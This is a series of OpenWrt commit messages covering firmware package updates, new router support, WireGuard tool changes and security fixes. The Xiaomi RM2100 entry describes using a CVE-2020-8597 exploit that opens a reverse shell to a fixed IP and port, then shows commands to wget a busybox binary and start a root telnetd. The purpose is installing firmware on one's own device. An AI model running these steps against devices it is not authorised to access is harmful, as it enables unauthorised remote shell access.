This version adds many bugfixes, including a couple of security
vulnerabilities:
- For fast math (enabled by wpa_supplicant option), use a constant time
modular inverse when mapping to affine when operation involves a
private key - keygen, calc shared secret, sign.
- Change constant time and cache resistant ECC mulmod. Ensure points
being operated on change to make constant time.
Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
This updates the package to contain the kernel object (.ko) file instead
of the plain object (.o) file.
Signed-off-by: Jeffery To <jeffery.to@gmail.com>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
When CONFIG_AUTOREMOVE is enabled, CFE binaries are removed before the
image creation.
Install CFE binaries to kernel directory and let autoremove clean the
files in PKG_BUILD_DIR.
Also drop unneeded tar cmd/options.
Fixes: dcee4eaa42 ("bcm63xx-cfe: add package with CFE RAM binaries")
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
* ipc: add support for openbsd kernel implementation
* ipc: cleanup openbsd support
* wg-quick: add support for openbsd kernel implementation
* wg-quick: cleanup openbsd support
Very exciting! wg(8) and wg-quick(8) now support the kernel implementation for
OpenBSD. OpenBSD is the second kernel, after Linux, to receive full fledged
and supported WireGuard kernel support. We'll probably send our patch set up
to the list during this next week. `ifconfig wg0 create` to make an interface,
and `wg ...` like usual to configure WireGuard aspects of it, like usual.
* wg-quick: support dns search domains
If DNS= has a non-IP in it, it is now treated as a search domain in
resolv.conf. This new feature will be rolling out across our various GUI
clients in the next week or so.
* Makefile: simplify silent cleaning
* ipc: remove extra space
* git: add gitattributes so tarball doesn't have gitignore files
* terminal: specialize color_mode to stdout only
Small cleanups.
* highlighter: insist on 256-bit keys, not 257-bit or 258-bit
The highlighter's key checker is now stricter with base64 validation.
* wg-quick: android: support application whitelist
Android users can now have an application whitelist instead of application
blacklist.
* systemd: add wg-quick.target
This enables all wg-quick at .services to be restarted or managed as a unit via
wg-quick.target.
* Makefile: remember to install all systemd units
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
CFE RAM is a second stage bootloader which is usually loaded by CFE ROM
(first stage bootloader) from a JFFS2 partition stored on the NAND.
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
The Linksys EA7500 v2 is advertised as AC1900, but its internal
hardware is AC2600 capable.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 256M (Nanya NT5CC128M16IP-DI)
FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI)
ETH: 5x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615N (4x4:4)
- 5GHz: 1x MT7615N (4x4:4)
- 4 antennas: 3 external detachable antennas and 1 internal
USB:
- 1x USB 3.0
- 1x USB 2.0
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x White led (Power)
- 6x Green leds (link lan1-lan4, link wan, wps)
- 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable)
Everything works correctly.
Installation
------------
The “factory” openwrt image can be flashed directly from OEM stock
firmware. After the flash the router will reboot automatically.
However, due to the dual boot system, the first installation could fail
(if you want to know why, read the footnotes).
If the flash succeed and you can reach OpenWrt through the web
interface or ssh, you are done.
Otherwise the router will try to boot 3 times and then will
automatically boot the OEM firmware (don’t turn off the router.
Simply wait and try to reach the router through the web interface
every now and then, it will take few minutes).
After this, you should be back in the OEM firmware.
Now you have to flash the OEM Firmware over itself using the OEM web
interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img
downloaded from the Linksys website).
When the router reboots flash the “factory” OpenWrt image and this
time it should work.
After the OpenWrt installation you have to use the sysupgrade image
for future updates.
Restore OEM Firmware
--------------------
After the OpenWrt flash, the OEM firmware is still stored in the
second partition thanks to the dual boot system.
You can switch from OpenWrt to OEM firmware and vice-versa failing
the boot 3 times in a row:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
If you want to completely remove OpenWrt from your router, switch to
the OEM firmware and then flash OEM firmware from the web interface
as a normal update.
This procedure will overwrite the OpenWrt partition.
Footnotes
---------
The Linksys EA7500-v2 has a dual boot system to avoid bricks.
This system works using 2 pair of partitions:
1) "kernel" and "rootfs"
2) "alt_kernel" and "alt_rootfs".
After 3 failed boot attempts, the bootloader tries to boot the other
pair of partitions and so on.
This system is managed by the bootloader, which writes a bootcount in
the s_env partition, and if successfully booted, the system add a
"zero-bootcount" after the previous value.
A system update performed from OEM firmware, writes the firmware on the
other pair of partitions and sets the bootloader to boot the new pair
of partitions editing the “boot_part” variable in the bootloader vars.
Effectively it's a quick and safe system to switch the selected boot
partition.
Another way to switch the boot partition is:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
In this OpenWrt port, this dual boot system is partially working
because the bootloader sets the right rootfs partition in the cmdline
but unfortunately OpenWrt for ramips platform overwrites the cmdline
so is not possible to detect the right rootfs partition.
Because all of this, I preferred to simply use the first pair of
partitions and set read-only the other pair.
However this solution is not optimal because is not possible to know
without opening the case which is the current booted partition.
Let’s take for example a router booting the OEM firmware from the first
pair of partitions. If we flash the OpenWrt image, it will be written
on the second pair. In this situation the router will bootloop 3 times
and then will automatically come back to the first pair of partitions
containg the OEM firmware.
In this situation, to flash OpenWrt correctly is necessary to switch
the booting partition, flashing again the OEM firmware over itself.
At this point the OEM firmware is on both pair of partitions but the
current booted pair is the second one.
Now, flashing the OpenWrt factory image will write the firmware on
the first pair and then will boot correctly.
If this limitation in the ramips platform about the cmdline will be
fixed, the dual boot system can also be implemented in OpenWrt with
almost no effort.
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
Co-Developed-by: Jackson Lim <jackcolentern@gmail.com>
Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
This drops kernel version switches for versions not supported by
OpenWrt master at the moment. This only adjusts local code, but
doesn't touch patches to existing external packages.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
crypto_bignum_rand() use needless time-consuming filtering
which resulted in SAE no longer connecting within time limits.
Import fixes from hostap upstream to fix that.
Signed-off-by: Daniel Golle <daniel@makrotopia.org>
2e73848 jail: SIGSEGV must not be forwarded to the child process
7e150f6 jail: unnamed jails can not have netns (fix segfault)
1ab539b jail: add option to provide /dev/console to containers
Signed-off-by: Daniel Golle <daniel@makrotopia.org>
This backports upstream fixes for the out of bounds write vulnerability in json-c.
It was reported and patches in this upstream PR: https://github.com/json-c/json-c/pull/592
Addresses CVE-2020-12762
Signed-off-by: Robert Marko <robert.marko@sartura.hr>
Signed-off-by: Luka Perkov <luka.perkov@sartura.hr>
[bump PKG_RELEASE]
Signed-off-by: Jo-Philipp Wich <jo@mein.io>
Program received signal SIGSEGV, Segmentation fault.
main_autofs (argv=<optimized out>, argc=<optimized out>)
at fstools-2020-05-06-eec16e2f/block.c:1193
1193: if (!m->autofs && (mp = find_mount_point(pr->dev))) {
Fixes: c3a43753b9 ("fstools: update to the latest version")
Signed-off-by: Daniel Golle <daniel@makrotopia.org>
Hotplug scripts are sourced so the #!/bin/sh is superfluous/deceptive.
Re-arrange script to only source 'procd' if we get to the stage of
needing to signal the process, reduce hotplug processing load a little.
Signed-off-by: Kevin Darbyshire-Bryant <ldir@darbyshire-bryant.me.uk>
The user can now enable the ACK timeout estimation algorithm (dynack)
for drivers that support it.
It is also expected that the distance config accepts the same values as:
$ iw phyX set distance XXX
Signed-off-by: Ali MJ Al-Nasrawy <alimjalnasrawy@gmail.com>
Certain SFP modules (most notably Nokia GPON ones) first check
connectivity on 1000base-x, and switch to 2500base-x afterwards. This
is considered a quirk so the phylink switches the interface to
2500base-x as well.
However, after power-cycling the uDPU device, network interface/SFP module
will not work correctly until the module is re-seated. This patch
resolves this issue by forcing the interface to be brought up in
2500base-x mode by default.
Signed-off-by: Jakov Petrina <jakov.petrina@sartura.hr>
Signed-off-by: Vladimir Vid <vladimir.vid@sartura.hr>
Cc: Luka Perkov <luka.perkov@sartura.hr>
Use same indent as for the rest of the file.
Signed-off-by: Javier Marcet <javier@marcet.info>
[add commit description]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This will enable platforms to extract caldata to an arbitrary file,
or patch mac in an abitrary file.
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
Rationale:
1/ This tool is no longer necessary following the implementation of a
sysfs driver
2/ The upstream author, Robert Marko, stated[1] that this tool had been
taken from his tree in an unfinished state not suitable for merging
[1] https://github.com/openwrt/openwrt/pull/2850#issuecomment-610277863
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
add option to set management IP pattern
also add missing 'unconfigure system hostname'
for example pattern '!192.168.1.1' makes it possible that
WAN IP is selected instead of LAN IP
Signed-off-by: Daniel A. Maierhofer <git@damadmai.at>
[grammar and spelling fixes in commit message]
Signed-off-by: Stijn Tintel <stijn@linux-ipv6.be>
Samba 3.6 is completely unsupported, in addition to having tons of patches
It also causes kernel panics on some platforms when sendfile is enabled.
Example:
https://github.com/gnubee-git/GnuBee_Docs/issues/45
I have reproduced on ramips as well as mvebu in the past.
Samba 4 is an alternative available in the packages repo.
cifsd is a lightweight alternative available in the packages repo. It is
also a faster alternative to both Samba versions (lower CPU usage). It
was renamed to ksmbd.
To summarize, here are the alternatives:
- ksmbd + luci-app-cifsd
- samba4 + luci-app-samba4
Signed-off-by: Rosen Penev <rosenp@gmail.com>
[drop samba36-server from GEMINI_NAS_PACKAGES, ksmbd rename + summary]
Signed-off-by: Stijn Tintel <stijn@linux-ipv6.be>
We do not have to define package for each board, and
consider variant's installing.
It is easier to maintain ls-dpl with only one package
installing all 4 files as intermediate files.
Signed-off-by: Yangbo Lu <yangbo.lu@nxp.com>
We do not have to define package for each board, and
consider variant's installing.
It is easier to maintain ls-mc with only one package
installing all two images as intermediate files.
Signed-off-by: Yangbo Lu <yangbo.lu@nxp.com>
We do not have to define package for each board, and
consider variant's installing.
It is easier to maintain fman-ucode with only one package
installing all two binaries as intermediate files.
Signed-off-by: Yangbo Lu <yangbo.lu@nxp.com>
Update tfa package to latest LSDK-20.04 dropping one patch
which had already been integrated.
Add fixes,
- Fix DEPENDS/PKG_BUILD_DEPENDS.
- Remove HIDDEN:=1.
- Move intermediate files installing into Build/InstallDev.
Signed-off-by: Yangbo Lu <yangbo.lu@nxp.com>
Update u-boot package to latest LSDK-20.04 dropping patches
which are no longer needed.
Adapt u-boot bootargs to kernel 5.4 for booting.
Signed-off-by: Yangbo Lu <yangbo.lu@nxp.com>
Update ls-rcw to latest LSDK-20.04.
Update patch 0001 with a new one.
Drop patch 0002 since it had been integrated.
Signed-off-by: Yangbo Lu <yangbo.lu@nxp.com>
We do not have to define package for each board, and
consider variant's building/installing.
It is easier to maintain ls-rcw with only one package
installing all boards RCW binaries as intermediate
files, each of which is just about hundreds of bytes.
Signed-off-by: Yangbo Lu <yangbo.lu@nxp.com>
* compat: timeconst.h is a generated artifact
Before we were trying to check for timeconst.h by looking in the kernel
source directory. This isn't quite correct on configurations in which
the object directory is separate from the kernel source directory, for
example when using O="elsewhere" as a make option when building the
kernel. The correct fix is to use $(CURDIR), which should point to
where we want.
* compat: use bash instead of bc for HZ-->USEC calculation
This should make packaging somewhat easier, as bash is generally already
available (at least for dkms), whereas bc isn't provided by distros by
default in their build meta packages.
* socket: remove errant restriction on looping to self
It's already possible to create two different interfaces and loop
packets between them. This has always been possible with tunnels in the
kernel, and isn't specific to wireguard. Therefore, the networking stack
already needs to deal with that. At the very least, the packet winds up
exceeding the MTU and is discarded at that point. So, since this is
already something that happens, there's no need to forbid the not very
exceptional case of routing a packet back to the same interface; this
loop is no different than others, and we shouldn't special case it, but
rather rely on generic handling of loops in general. This also makes it
easier to do interesting things with wireguard such as onion routing.
At the same time, we add a selftest for this, ensuring that both onion
routing works and infinite routing loops do not crash the kernel. We
also add a test case for wireguard interfaces nesting packets and
sending traffic between each other, as well as the loop in this case
too. We make sure to send some throughput-heavy traffic for this use
case, to stress out any possible recursion issues with the locks around
workqueues.
* send: cond_resched() when processing tx ringbuffers
Users with pathological hardware reported CPU stalls on CONFIG_
PREEMPT_VOLUNTARY=y, because the ringbuffers would stay full, meaning
these workers would never terminate. That turned out not to be okay on
systems without forced preemption. This commit adds a cond_resched() to
the bottom of each loop iteration, so that these workers don't hog the
core. We don't do this on encryption/decryption because the compat
module here uses simd_relax, which already includes a call to schedule
in preempt_enable.
* selftests: initalize ipv6 members to NULL to squelch clang warning
This fixes a worthless warning from clang.
* send/receive: use explicit unlikely branch instead of implicit coalescing
Some code readibility cleanups.
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>